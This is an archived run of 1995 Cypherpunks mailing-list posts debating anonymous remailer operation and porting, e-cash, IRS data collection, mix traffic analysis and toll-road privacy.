-- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From greg at ideath.goldenbear.com Fri Jan 20 17:45:41 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 20 Jan 95 17:45:41 PST Subject: Remailers-in-a-box Message-ID: <199501210129.AA01692@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: > I am waiting for such services to be actually, formally, solidly > announced, not just casual remarks that it might be possible. And of > course the software should be "ready to wear," port-a-potty, so that > the remailer account owner does nothing more than pay for the account. In this model, who deals with mailbombs/spams/requests for address blocks? It is this sort of administrivia (plus the threat of liability) that makes running a remailer troublesome, not a lack of someone's $20/month. I think it's disingenuous to say that "X pays the bills for the network link; X purchased the hardware and keeps it running; the box is in X's house/office; X is the person who reads complaint mail and responds (or fails to); but because Y sends X $20/month, the remailer (and attendant liability for its mis/use) belongs to Y." I realize that there's a certain formal logic to it, but I don't think that anyone - not courts, and not the world-in-general - is going to pay attention to that formalism when it's clear that a machine essentially under the control of X is being used for 'antisocial' means. I'm seriously considering offering this sort of remailer-in-a-box thing, but there's a certain amount of hassle associated with running a remailer. It can be shifted to different parties, but it must be paid for one way or another. I guess it'd be possible to treat remailers as disposable - when one had pissed off enough people, it could be abandoned - but this lack of long-term reliability seems poor. 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLyBjVX3YhjZY3fMNAQEI3QP/YdqBbhn5k4Q+NtD3zoJCG7qIfGaQqogH AFFmItuU46rFQHHSxPl+p4fNmX+32yEva04ORq28NWPKggXiXhwN+LQDshWomSU8 gXkysIPdGeogSDxP6+JxXatE81TpuCjOtbGH3KlmCNaRbB0685zBVB7Oj1O/D5it zqM9JuV8yAE= =EQY5 -----END PGP SIGNATURE----- From jamesd at netcom.com Fri Jan 20 18:23:18 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 20 Jan 95 18:23:18 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: Message-ID: At 6:54 PM 01/20/95, anonymous-remailer at shell.portal.com wrote: > > But electronic computers are good at checking out these kinds of > >chains automatically. Suppose there were a web of debt-trust. Each > >person would indicate the other people who's iou's they will accept > >(and the amount they would be willing to take). Thus I might take (up > >to $10 of) Jo's, who might take Carol's who might take Terry's, etc. On Fri, 20 Jan 1995, Jonathan Rochkind wrote: > Certainly, that's what money is after all. Pretty much. But how are you > going to transfer these IOUs electronically in a way that is relatively > fraud-proof? I believe that the point that anonymous was making is that if everyone is their own bank and their own currency issuer, then identity based cash is just as resistant to state power, and perhaps more resistant, than anonymous cash. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.catalog.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state. | jamesd at netcom.com From davidm at iconz.co.nz Fri Jan 20 18:25:38 1995 From: davidm at iconz.co.nz (David Murray) Date: Fri, 20 Jan 95 18:25:38 PST Subject: Why emoney? Why not a web of debt? 
Message-ID: <199501210224.PAA22017@iconz.co.nz> >At 6:54 PM 01/20/95, anonymous-remailer at shell.portal.com wrote: >> But electronic computers are good at checking out these kinds of >>chains automatically. Suppose there were a web of debt-trust. Each >>person would indicate the other people who's iou's they will accept >>(and the amount they would be willing to take). > >Certainly, that's what money is after all. Pretty much. But how are you >going to transfer these IOUs electronically in a way that is relatively >fraud-proof? Digital money. Ecash. [...] > And another way to look at it is that you are just proposing an >ecash system where every person issues their own ecash, instead of just a >few central banks doing it. The question of how to value ecash issued by different entities of varied credit-worthiness is an interesting one. I had been thinking along the lines of one or more centralised (but independent) credit rating agencies (a la Standard and Poors or Moodys) that one would subscribe to. Then you would value the various edollars in terms of their credit rating -- so you might sell something for $4 of CyberCash (NA) BV ecash, or $5 of FliBiNite NL ecash and so on. But of course, since ecash is worth only what you can get for it, the web of trust model, since it reflects what people will give for it, seems to reflect that underlying value much better. The best way to underpin the value of ecash is for the issuer to (credibly) undertake to convert it into real money. This gets around the problem of no one on the net making enough things you want: the old 'you can't eat cyberspace' saw. McDonalds may not accept ecash, but if a simple trip to the relevant ebank's Web page can put the price of a Big Mac in your real-money account, that is only a timing problem. [Of course, you have to come out from behind the anonymous ecash shield to do that, but that is a problem of being a real person. 
If you want to keep your wealth anonymous, don't buy a flash car and the latest Monet to go on sale -- invest it in an anonymous corporation.] An ebank along these lines could be set up reasonably cheaply (apart from the technical hurdles ;-), and could easily scale up as needed, and migrate to safer (taxhaven/banking secrecy) jurisdictions when turnover etc warranted it. David From rfb at lehman.com Fri Jan 20 18:59:12 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Fri, 20 Jan 95 18:59:12 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501202311.AB09922@eri.erinet.com> Message-ID: <9501210257.AA29480@cfdevx1.lehman.com> Date: Fri, 20 Jan 95 18:11:54 EST From: "Paul J. Ste. Marie" At 12:44 PM 1/20/95 CST, xpat at vm1.spcs.umn.edu wrote: >Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > . . . Comments on the proposed system must be received by January 19, 1995, Ok, let me get this straight. In nine days there will be an article which will mention that yesterday was the last day to comment on this. Cool! :-) Rick From tcmay at netcom.com Fri Jan 20 19:07:08 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 19:07:08 PST Subject: Remailers-in-a-box In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com> Message-ID: <199501210301.TAA09022@netcom14.netcom.com> Greg Broiles wrote: > Tim May wrote: > > > I am waiting for such services to be actually, formally, solidly > > announced, not just casual remarks that it might be possible. And of > > course the software should be "ready to wear," port-a-potty, so that > > the remailer account owner does nothing more than pay for the account. > > In this model, who deals with mailbombs/spams/requests for address blocks? > It is this sort of administrivia (plus the threat of liability) that > makes running a remailer troublesome, not a lack of someone's $20/month. 

In this model the owner of the machine (who is not himself a remailer, only a seller of accounts) simply ignores all such issues of mailbombs, spams, requests for address blocks. He has a form letter that says something like:

"I am not the initiator of any mail bombs, spams, or illegal mail. I merely sell accounts, like private mail boxes. Some of the mail you are objecting to may have originated on my system, some may merely have passed through my system, just as mail passes through many systems from sender to receiver. If you have problems, talk to the sender, not to me. Under the ECPA I cannot even _look_ at the mail on my system, and even if it were legal, I would not."

> I think it's disingenuous to say that "X pays the bills for the network
> link; X purchased the hardware and keeps it running; the box is in X's
> house/office; X is the person who reads complaint mail and responds (or
> fails to); but because Y sends X $20/month, the remailer (and attendant
> liability for its mis/use) belongs to Y." I realize that there's a
> certain formal logic to it, but I don't think that anyone - not courts,
> and not the world-in-general - is going to pay attention to that
> formalism when it's clear that a machine essentially under the control
> of X is being used for 'antisocial' means.

It likely buys a couple of years of protection, though. Currently the remailer sites = remailer accounts, so they have little or no protection.

I don't think "disingenuous" is a very apt description. For one thing, my proposal certainly doesn't make things any _worse_ for the true remailers.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From tcmay at netcom.com Fri Jan 20 19:09:29 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 19:09:29 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501201859.AA06028@snark.imsi.com> Message-ID: <199501210308.TAA09743@netcom14.netcom.com> Perry E. Metzger wrote: > xpat at vm1.spcs.umn.edu says: > > Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > > > > Here's the kicker: "Although agency officials concede that some of > > the data collected will be inaccurate, taxpayers will not be allowed > > to review or correct it" ^^^^^^^^^^^^^^^^^^^ > > ^^^^^^^^^^^^^^^^^^^^^^^ > > So much for the FOIA. > > The privacy act and FOIA make that more or less illegal -- if they are > keeping information on you, with certain law enforcement related > exceptions they have to let you see it. The articles I've read on this new system ("Compliance 2000") make it clear that the IRS will be buying data from non-governmental entities, e.g., the direct marketing databases and the commercial credit reporting agencies. This neatly skirts the FOIA, as the FOIA cannot be used to force a private entity or corporation to reveal its own data (which, as a libertarian, I am glad of....I wouldn't want folks demanding to sift through my records, files, and dossiers). This just extends the type of "subcontracting" to nominally private entities that the intelligence community began many years ago. The corporation, "Dossiers R Us," will be the "Air America" for our age. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. 
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From rfb at lehman.com Fri Jan 20 19:19:28 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Fri, 20 Jan 95 19:19:28 PST
Subject: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <9501210318.AA05326@cfdevx1.lehman.com>

    From: Greg Broiles
    Date: Fri, 20 Jan 1995 17:28:58 -0800 (PST)

    Tim May wrote:

    > I am waiting for such services to be actually, formally, solidly
    > announced, not just casual remarks that it might be possible. And of
    > course the software should be "ready to wear," port-a-potty, so that
    > the remailer account owner does nothing more than pay for the account.

    In this model, who deals with mailbombs/spams/requests for address blocks?

With sameer's recently announced RIAB, it seems quite reasonable that Tim could follow the instructions that were sent out and when he gets to this one:

    3) If you wish, you can setup a .forward file to point to
    mailfilters or to another account.

then he could do this:

    % echo 'tcmay at netcom.com' > ~/.forward

and then he would never have to log into c2 again. This is not quite at the level of what Tim explicitly stated: ``remailer account owner does nothing more than pay for the account.'', but it's about as close as one could hope for while addressing your concerns.

Of course, Tim could adopt `hands off' administration by doing any of the following:

 - forwarding to /dev/null
 - using auto-bounce script
 - forwarding to tcmay at netcom.com, but ignoring all mail related to his remailer.

It might be a good idea to check that sameer thinks this is ok. It's bound to piss people off more than remailers with a more interactive administrator. It basically says that mail bombs and spams are acceptable and requests are pointless.
Rick From dan at chopin.udel.edu Fri Jan 20 19:20:06 1995 From: dan at chopin.udel.edu (The Dalai Lama) Date: Fri, 20 Jan 95 19:20:06 PST Subject: The Remailer Crisis In-Reply-To: <9501201626.AA03495@firefly.prairienet.org> Message-ID: On Fri, 20 Jan 1995, Jeff Licquia wrote: > I envision a setup right now where you could (if you wanted) type "remailer" > at the DOS prompt to bring the remailer up. The screen would show a > monitor-type program, with a menu option to "R)eboot" to DOS again (or you > could just hit Ctrl-Alt-Del). > So why not just implement remailers for the DOS/OS/2/Windows NT crowd? I think we'd see more remailers if people didn't need to leave their OS of choice just to run UNIX and a remailer. OS/2 and Windows NT are stable platforms. If there was little performance impact caused by an OS/2 remailer process, I'd be more than willing to let it run. Is anyone working on porting remailer code to one of the IBM/Microsoft operating systems? Perhaps I'll get cracking on an OS/2 version.... Dan -- [Here's something for those friendly mail scanners...] hack phreak crack assassinate president virus espionage clinton honduras root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche From weidai at eskimo.com Fri Jan 20 19:22:33 1995 From: weidai at eskimo.com (Wei Dai) Date: Fri, 20 Jan 95 19:22:33 PST Subject: traffic analyzing Chaum's digital mix In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 20 Jan 1995, Hal wrote: > Another interesting aspect of your analysis is the possible role of > latency. Earlier I had thought of latency as primarily a way of doing > mixing, an alternative or addition to batching which mixes messages > without holding them up quite as much. 
> But in terms of this in/out
> analysis latency could play a part in blurring the batch boundaries,
> adding more uncertainty and making the job of the analyst harder so he
> would need more data to establish his scores.

Latency (by which I take to mean some kind of random delay) will probably make the analyst's job harder, but I suspect not by much. The method of analysis I outlined earlier can be modified to apply to mixes that use random delay instead of batching as the method of mixing. Instead of adding up the number of times Alice's message to the mix is followed up by a message from the mix to a user, take the sum of the probabilities that each message the user receives is from Alice. So you would do something like this for each user of the mix:

message #    probability this message came from Alice
1            0.000135
2            0
3            0.000012
4            0.004332
SUM:         0.004479

Each probability can be calculated from the statistical distribution of the delay time, the length of time between Alice sending the last message to the mix and the user receiving a message from the mix, and the timing and number of other messages sent by the mix around this period of time.

This method is more general than the one I talked about earlier, since it is equivalent to the former method when you apply it to a batching mix (that is, the original Chaumian mix).

From jcorgan at scruznet.com Fri Jan 20 19:23:27 1995
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Fri, 20 Jan 95 19:23:27 PST
Subject: Remailers-in-a-box
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>I guess it'd be possible to treat remailers as disposable - when one
>had pissed off enough people, it could be abandoned - but this lack
>of long-term reliability seems poor.

Someone had posted a protocol scheme that would allow new remailers to advertise their existence on a newsgroup, which would cause any number of auto pinging "reputation" services to begin monitoring this new remailer automatically. Once reliability, etc., was established, the reputation services would "add" this node to the remailernet. Similar actions would take place if a remailer just "went away".

Quality of service, features, etc., would be part of the advertisement, and would result in a form of competition between remailers. Similarly, reputation services would have differing criteria for "blessing" a site, which would result in a form of competition between the _reputation servers_ for a good reputation.

The key to this whole scheme is in the automation of the process. Done correctly, it would result in a self-organizing, self-healing ecology of remailers, that would naturally gravitate toward providing the features and services in most demand.

Yeah, sure. Looks good on paper, anyway. Lots of real-life hassles to work out, but it _probably_ could be made to work.

==
Johnathan Corgan "Violence is the last refuge of the incompetent."
jcorgan at scruznet.com -Isaac Asimov

From dmandl at panix.com Fri Jan 20 19:57:18 1995
From: dmandl at panix.com (David Mandl)
Date: Fri, 20 Jan 95 19:57:18 PST
Subject: Hakim Bey URL, etc.
Message-ID:

The URL for the Hakim Bey web site (someone might have already posted this) is:

http://www.uio.no:80/~mwatz/bey/

Excerpt from the Hakim Bey interview in "Axcess" magazine (conducted last summer):

"I have to admit I felt a certain intense interest, perhaps even amounting to a potential enthusiasm, when this tech was first being discussed," Bey told me. I'd read William Gibson like the rest of us, and I certainly understood his dystopian point, but nevertheless, when Tim Leary and people like that began to get enthusiastic, I had to investigate on that level. I haven't seen much evidence that what Uncle Tim thought was going to happen is really happening. Once again, any technology could be democratic if it were distributed, you know what I mean? It's a simple Marxist thing about means of production. There's nothing inherently authoritarian--at least at first glance--to any technology, although one could argue about how technology then shapes the society that has already shaped the technology in a kind of feedback loop that can move towards greater and greater authoritarianism or lack of autonomy. The potential for what, back in the 50's and 60's, people were calling electronic democracy, is obviously still there as a potential structure. You can see certain elements of it in the Net, but when you're talking about the high tech involved in virtual reality you're really talking about something that is not accessible to most people. And I think it probably never will be.
There's never going to be any cheap VR kit that's going to allow a dock worker in Manila to get on some kind of cyberspace Internet, much less a dock worker in Atlanta--or me, for example." Bey was equally gloomy about the future of the Internet. "My impression is that 90 per cent of what goes out over it is completely unrelated to any kind of freedom interests, autonomy proposals or projects, or struggles for genuine non-hierarchical, non-authoritarian group dynamic. Most of it is just chit-chat--banal chit-chat that could just as easily be carried out over an old-fashioned party line phone." Unabashed in my online addiction, I couldn't help but ask if he saw _any_ way to realize the internet as a T.A.Z. "I'm led to believe, through conversations with people who are much more techie and active than I am, that cypher--unbreakable code--is the key. So the cypherpunks are the people to keep an eye on at this moment. They tend to be the ones who are most active around freedom of speech issues...whether legal or extra-legal. Even so, Bey felt that the powers that be will never allow the "Information Superhighway" to develop unchecked. "I think Clipper was a declaration of war on the Net. The fact that the egg is on their face, because within ten minutes some hacker figured out how to beat the Clipper, is an indication of--oh, let's call it an area of chaos. Within areas of chaos, either horrible destruction and disease and death occur. Or, if you're flowing the right way, and if all hearts are beating in unison to a certain degree, then that area of chaos can become the T.A.Z. Now I've said over and over again that there's no such thing as a T.A.Z. that's only on the Net, and I maintain that that's true. In order to have autonomy, you have to have physicality. Autonomy is not something that can only exist in the imagination or in the world of images. 
I think that it involves the entirety, the whole axial being, and that is rooted in the earth and concerns physicality, materiality, the body--mortality, if you like--as contrasted to the spurious immortality of cyberspace. But I still maintain that, at least in theory, the Net could be an adjunct to the T.A.Z., could be a tool or a weapon, even, if you want to look at it that way, for the construction of the T.A.Z."

--
Dave Mandl
dmandl at panix.com

From Jaeson.M.Engle at josaiah.sewanee.edu Fri Jan 20 20:14:25 1995
From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 20:14:25 PST
Subject: The Remailer Crisis
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Okay. Here's my 2-bits.

I run on the MacOS, but how hard could it be to port this code? If anyone is willing to do this (I assume it's not written in Pascal, which is my only language of any consequence), I will run it. It will be available from now until I graduate in '98 during the school months. If anyone wants to try this from scratch, we could try it in Pascal. I would be very willing to do the developing as well as host a discussion list for anyone who jumps in.

I will take no response to mean that all options are not going to be pursued, and that this discussion is just that, a discussion.

- -Kyraden

aka:
(-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-)
(-: www server: http://josaiah.sewanee.edu/ :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme at josaiah.sewanee.edu' for my Public :-)
PGP block.
From tc at phantom.com Fri Jan 20 20:26:07 1995
From: tc at phantom.com (Dave Banisar)
Date: Fri, 20 Jan 95 20:26:07 PST
Subject: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201845.AA09218@toad.com>
Message-ID:

A copy of the IRS notice and EPIC's response are available at cpsr.org /cpsr/privacy/epic/. The article below ran on the Knight Ridder newswire and appeared in at least 20 newspapers.

We got a call late tonight from the IRS saying they were yanking the proposal.

Dave

On Fri, 20 Jan 1995 xpat at vm1.spcs.umn.edu wrote:

> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>
> "IRS plans to collect more data on individuals to nab tax cheats"
>
> a "vast expansion of secret computer database of information it
> keeps on virtually all Americans" will include "credit reports,
> news stories, tips from informants, and real estate, motor vehicle
> and child support records, plus conventional Govt financial data"
>
> "Any individual who has business and/or financial activities can
> expect upgraded agency reports to be put to IRS auditors promptly"
>
> Here's the kicker: "Although agency officials concede that some of
> the data collected will be inaccurate, taxpayers will not be allowed
> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> ^^^^^^^^^^^^^^^^^^^^^^^
> So much for the FOIA.
>
> ------------------------------------------------------------------------
> P M Dierking |
>

From tcmay at netcom.com Fri Jan 20 21:18:50 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 21:18:50 PST
Subject: The Remailer Crisis
In-Reply-To:
Message-ID: <199501210517.VAA16355@netcom13.netcom.com>

Rhys Kyraden wrote:

> Okay. Here's my 2-bits.
> I run on the MacOS, but how hard could it be to port this code? If anyone
> is willing to do this (I assume it's not written in Pascal, which is my
> only language of any consequence), I will run it. It will be available from
> now until I graduate in '98 during the school months.
If anyone wants to
> try this from scratch, we could try it in Pascal. I would be very willing
> to do the developing as well as host a discussion list for anyone who jumps
> in.

But is your Mac on the Internet on a more or less continuous basis? A remailer that only works when the owner happens to log on to collect his mail is not terribly useful (though not useless, as others have also noted....just a "very unpredictable lag time" remailer, sort of the "surface mail" of e-mail).

It happens that the Net is mainly built up of Unix boxes, hence the focus here on Unix. OS/2, Windows, and Mac boxes will be used increasingly for constant connection applications, so the idea has merit, long term.

(Another nit: the Mac, which is what I also use, currently lacks preemptive multitasking. Thus, if one's Mac is playing a multimedia CD-ROM when new mail comes in, it likely won't get remailed until the first app quits or is manually switched out. (Yeah, a few things like print drivers can run in background, and maybe the new TIA emulators can trick the OS into processing SLIP or PPP mail in the background, but who knows?) The consensus is that the Mac is powerful, but it ain't cut out yet to be a Unix box.)

The language is a lesser deal. Remember that Eric Hughes knocked out the first remailer in Perl in a few days, and MacPerl exists for the Mac. Going to Pascal would probably be more trouble than it's worth.

But the most important feature to have is a solid, reliable connection to the Net. A computer that gets taken to classes, is not connected to the Net, etc., is not very useful as a remailer.

(The key is not that a remailer can sometimes remail, but that it can be counted on to be part of chain without the mail getting "dropped on the floor.")

--Tim May

--
..........................................................................
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
| knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From tcmay at netcom.com Fri Jan 20 21:38:37 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 21:38:37 PST
Subject: The Remailer Crisis
In-Reply-To:
Message-ID: <199501210537.VAA19112@netcom13.netcom.com>

The Dalai Lama wrote:

(By the way, Hello, Dalai!)

> So why not just implement remailers for the DOS/OS/2/Windows NT crowd?
> I think we'd see more remailers if people didn't need to leave their OS
> of choice just to run UNIX and a remailer. OS/2 and Windows NT are
> stable platforms. If there was little performance impact caused by an
> OS/2 remailer process, I'd be more than willing to let it run.
> Is anyone working on porting remailer code to one of the
> IBM/Microsoft operating systems? Perhaps I'll get cracking on an OS/2
> version....

I addressed this main issue in the posting about writing remailers for Macs, so I'll be ultra-brief here.

Had DOS/Windows/OS/2 boxes been "on the Net" in a serious way when Eric wrote the first remailer in 1992, he could have written the remailer for the DOS box he then owned.

The issue has been that Unix boxes have dominated the Net, with lots of tools for handling mail, redirecting output, etc. DOS tends to have standalone apps, with cumbersome communication, and DOS has not had preemptive multitasking as Unix of course has had.

"The network is the computer," as Scott McNealy used to say, and a reliable and continuous Net connection is much more important for a remailer than a fast CPU or GUI environment.
This will change, based on the numbers of Windows and OS/2 systems being sold, and based on moves to build in Net connection capabilities.

--Tim May

--
..........................................................................
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
| knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From northrop at netcom.com Fri Jan 20 21:39:08 1995
From: northrop at netcom.com (Scott Northrop)
Date: Fri, 20 Jan 95 21:39:08 PST
Subject: "Smart Roads" for toll collection and traffic logging
Message-ID: <199501210538.VAA13452@netcom5.netcom.com>

Here in Seattle there is a proposal to turn a couple of traffic chokepoints into toll roads. Because a toll plaza would back things up even worse, I'm guessing they'll look to an automated system that will let you pay without leaving your car. This is established tech -- a nifty article about it showed up in _Electronic Design_ last month.

The downside is that it'll not be designed with privacy in mind at all, and will eventually have this pesky database of who went by the toll booth and when. We all know that old databases never die, they just get put on tape and stuffed in a box, to wait for someone with a curious streak to come by.

This is a well-established problem with naive designs of automated toll plazas, and I am looking for examples of things that could be done with this database by someone with ill intent, or could be done with the toll system itself if it got to be more widespread.

- Obviously, if your car is talking to the road all the time, speeding tickets are a gimme.
- You might be targeted for "further investigation" if you happen to drive by the wrong part of town. Gotta step up the heat on that war on drugs, ya know.

I can come up with all sorts of ways to detect people from committing crimes (and don't really need those examples -- folks might think I *want* a Big Brother Highway!), but I'm curious what people's fears are about what this could mean to innocent folks, Joe Sixpack and his pals.

There is a meeting in a few days where public comment on the toll road idea is being solicited, and I want to have some really compelling horror stories with which to capture people's imaginations about what a Big Brother Highway could mean. I want to scare people, but I want to scare 'em with something believable.

If there's an archive that mentions anything like this, please point it out in private mail. I'll summarize what I get to the list, and also make that document available on the web, if anything interesting comes up.

Thanks!

Scott

--
Scott Northrop (206)559-9878
northrop at netcom.com, northrop at mccaw.com
Those who use arms well cultivate the Way and keep the rules. Thus they can govern in such a way as to prevail over the corrupt. -- Sun Tzu, The Art of War, Book IV

From Jaeson.M.Engle at josaiah.sewanee.edu Fri Jan 20 21:51:21 1995
From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 21:51:21 PST
Subject: The Remailer Crisis
Message-ID:

>But is your Mac on the Internet on a more or less continuous basis? A
>remailer that only works when the owner happens to log on to collect
>his mail is not terribly useful (though not useless, as others have
>also noted....just a "very unpredictable lag time" remailer, sort of
>the "surface mail" of e-mail).

Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week (during school months!;-)) The server you just mailed to is on this machine.

>It happens that the Net is mainly built up of Unix boxes, hence the
>focus here on Unix.
OS/2, Windows, and Mac boxes will be used
>increasingly for constant connection applications, so the idea has
>merit, long term.

I understand this, and am trying my best to cope. I am currently in the process of developing a name server for the Mac, because the Mac has a lot against it when it comes to being a real entity on the 'Net.

>(Another nit: the Mac, which is what I also use, currently lacks
>preemptive multitasking. Thus, if one's Mac is playing a multimedia
>CD-ROM when new mail comes in, it likely won't get remailed until the
>first app quits or is manually switched out. (Yeah, a few things like
>print drivers can run in background, and maybe the new TIA emulators
>can trick the OS into processing SLIP or PPP mail in the background,
>but who knows?) The consensus is that the Mac is powerful, but it
>ain't cut out yet to be a Unix box.)

I agree that the Mac lacks some of the more powerful Unix features, namely preemptive multitasking, but I also believe that, at least with the newer Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck Shotton's MacHTTP WWW server for the Mac? An excellent piece of software that gives literally on demand, and at least with my copy, it is always in the background. Really about the only thing that cuts out CPU timesharing is multimedia, mostly 3D graphics games and highly intense graphics software, neither of which I use (much!;-))

>The language is a lesser deal. Remember that Eric Hughes knocked out
>the first remailer in Perl in a few days, and MacPerl exists for the
>Mac. Going to Pascal would probably be more trouble than it's worth.

I thought that it was in Perl. I have tried pulling Unix Perl scripts and running them under MacPerl, but it doesn't quite do it. In fact, it usually doesn't do anything but spew errors back at you.

>But the most important feature to have is a solid, reliable connection
>to the Net.
A computer that gets taken to classes, is not connected to
>the Net, etc., is not very useful as a remailer.

As I noted, I have a constant 56k line in/ out. And mine never moves... it's a bit large... mine is a Quadra 660av (ugh).

>(The key is not that a remailer can sometimes remail, but that it can
>be counted on to be part of chain without the mail getting "dropped on
>the floor.")
>
>--Tim May

As far as I can tell, and maybe you have other knowledge on this, my situation should work, assuming I can run the software. What do you think? Should the remailer Perl script run under MacPerl?

aka:
(-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-)
(-: www server: http://josaiah.sewanee.edu/ :-)
(-: It's February 3rd! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme at josaiah.sewanee.edu' for my Public :-)
PGP block.

From jpp at markv.com Fri Jan 20 22:09:15 1995
From: jpp at markv.com (jpp at markv.com)
Date: Fri, 20 Jan 95 22:09:15 PST
Subject: cpla mailing list revived
Message-ID: <9501202206.aa14003@hermix.markv.com>

The quietness of the cpla list was brought to my attention recently. I have improved the list software, changed the list address into a real internet style mailing list. You should now be able to join and depart the cpla mailing list automatically. Who knows, this might even prompt a physical get-together.

I will be adding the members of the old list to the new list, so expect to get another copy of the welcome message if you were on the cpla list a while ago.

Here is a copy of the welcome message, FYI.

Welcome to the Cypherpunks LA mailing list.

Like every moderator of every new list, I hope this will be mostly signal and very little noise. I don't envision this as a general discussion list -- that's what the main list is for.

This list is for:

Coordinating physical meetings of Cypherpunks in the Los Angeles area: Location, time, equipment, arranging rides, etc.

Suggesting topics to cover at the meetings.
Coordinating other local group activities.

Announcements of relevant talks, seminars and other such goodies in the Los Angeles area and environs.

*Concise* pointers to other local groups, mailing lists, and sources of information that might be of interest to local Cypherpunks.

Whatever everyone seems to use it for.

This list is NOT for:

Reposting the "important" messages from the main list or any other mailing list or newsgroup. (If someone wants to run a "distilled" Cypherpunks list, fine. This isn't it!)

Preaching to the converted. No ranting! (If you want to rant, do it on the main list. Everyone else seems to...)

Rehashing the same topics that are going on the main list.

This list is now managed by a simple minded program. Send a message with a blank body and the subject 'subscribe' to be added to the list. The subject 'unsubscribe' will remove you from the list.

Any suggestions for how to improve this intro are welcome. Any suggestions for a *local* FAQ are also welcome. Direct your suggestions to me at jpp at markv.com. PGP/ViaCrypt mail gladly accepted.

This information is also available at ftp://ftp.markv.com/pub/jpp/cp-la-hi.txt

j'

From tcmay at netcom.com Fri Jan 20 22:12:38 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 22:12:38 PST
Subject: "Smart Roads" for toll collection and traffic logging
In-Reply-To: <199501210538.VAA13452@netcom5.netcom.com>
Message-ID: <199501210610.WAA24523@netcom13.netcom.com>

Scott Northrop wrote:

> Here in Seattle there is a proposal to turn a couple of traffic chokepoints
> into toll roads. Because a toll plaza would back things up even worse, I'm
...
> The downside is that it'll not be designed with privacy in mind at all, and
> will eventually have this pesky database of who went by the toll booth and
> when. We all know that old databases never die, they just get put on tape and
> stuffed in a box, to wait for someone with a curious streak to come by.
This

No doubt the various cities and local governments can raise extra revenue by selling the tracking data to the IRS for their new "Compliance 2000" program, to FinCEN to see if suspicious travel patterns are being engaged in, to the War on Some Drugs soldiers to see if the car is deemed to be a drug carrier, and so on.

Even better, women seeking abortions, for example, could be denied access to the toll roads that are known to lead to the evil abortionists! The possibilities are endless.

All of this is old news, in that Brunner warned of ubiquitous computers in "The Shockwave Rider," and Chaum explicitly dealt with the threat of position tracking in his proposal for digital, untraceable cash.

Lucky Greene demonstrated at the last CP meeting a toll payment card that uses Digicash. About the size of a credit card, it handles the payment but is unlinkable to driver or car ID.

Cities won't use this technology unless customers demand it. Of course, cities don't view road users as customers who can take their business elsewhere. I don't expect very widespread use of digicash.

--Tim May

--
..........................................................................
